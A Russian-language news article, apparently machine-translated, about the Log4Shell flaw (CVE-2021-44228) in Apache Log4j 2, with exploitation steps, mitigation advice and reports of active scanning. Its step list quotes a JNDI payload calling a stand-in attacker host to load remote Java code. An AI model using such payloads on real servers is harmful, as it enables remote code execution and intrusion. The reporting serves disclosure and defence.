Критическая уязвимость была обнаружена в Apache Log4j 2, пакете Java с открытым исходным кодом, который используется для включения ведения журнала во многих популярных приложениях и может использоваться для удаленного выполнения кода на бесчисленных серверах.
Apache Software Foundation (ASF) определила уязвимость как CVE-2021-44228; Он был назван LunaSec, поэтому Log4Shell. (И исследователь безопасности Кевин Бомонт был достаточно любезен Создать логотип Так же.) говорит ASF Log4Shell получает максимальный рейтинг серьезности 10 по шкале CVSS.
LunaSec предоставляет пошаговое описание того, как использовать Log4Shell на уязвимых серверах:
-
Данные отправляются от пользователя на сервер (по любому протоколу),
-
Сервер записывает данные в запрос, который содержит вредоносную полезную нагрузку:
${jndi:ldap://attacker.com/a}(гдеattacker.comэто сервер, управляемый злоумышленником), -
Уязвимость Log4j запускается этой полезной нагрузкой, и сервер делает запрос к
attacker.comс помощью «Именование Java и интерфейс каталогов(JNDI), -
Этот ответ содержит путь к удаленному файлу класса Java (например,
http://second-stage.attacker.com/Exploit.class), которые вводятся в серверный процесс, -
Эта внедренная полезная нагрузка запускает второй этап и позволяет злоумышленнику выполнить произвольный код.
Исследователи Я уже нашел подсказки Log4Shell можно использовать на серверах Apple, Cloudflare, Twitter, Valve, Tencent и других крупных компаний. Считается, что уязвимость особенно легко использовать на серверах Minecraft, а также с некоторыми доказательство концепции Атаки с использованием не более чем внутриигрового чата.
Log4j версии 2.15.0 был выпущен для устранения этого недостатка, но отчеты журнала При его исправлении значение по умолчанию изменяется с «false» на «true». Пользователи, которые меняют настройку на «false», остаются уязвимыми для атак. К счастью, это означает, что серверы с более ранними версиями Log4j могут смягчить атаку, изменив этот параметр.
Рекомендовано нашими редакторами
ASF сообщает, что «это поведение можно смягчить, установив для системного свойства ‘log4j2.formatMsgNoLookups’ значение ‘true’ или удалив класс JndiLookup из пути к классам (например: zip -q -d log4j-core — *. Jar org / apache / log4j / core / lookup / JndiLookup.class) »в предыдущих версиях Log4j, если пользователи не могли выполнить обновление до версии 2.15.0.
в Группа реагирования на компьютерные чрезвычайные ситуации (CERT) для Новой Зеландии, Deutsche Telekom CERT, то зелень Охранная компания и другие компании сообщили, что злоумышленники активно ищут серверы, уязвимые для атак Log4Shell. Эти усилия будут продолжаться и будут расширяться, поэтому как можно быстрее устранить уязвимость крайне важно.
Нравится то, что вы читаете?
подписать для мониторинг безопасности Информационный бюллетень с нашими главными новостями о конфиденциальности и безопасности, доставленный прямо на ваш почтовый ящик.
Этот информационный бюллетень может содержать рекламу, предложения или партнерские ссылки. Подписка на информационный бюллетень означает ваше согласие с Условия эксплуатации И Политика конфиденциальности. Вы можете отказаться от подписки на информационные бюллетени в любое время.
«Профессиональный интернет-практик. Знаток путешествий. Гордый исследователь. Главный зомби-первопроходец».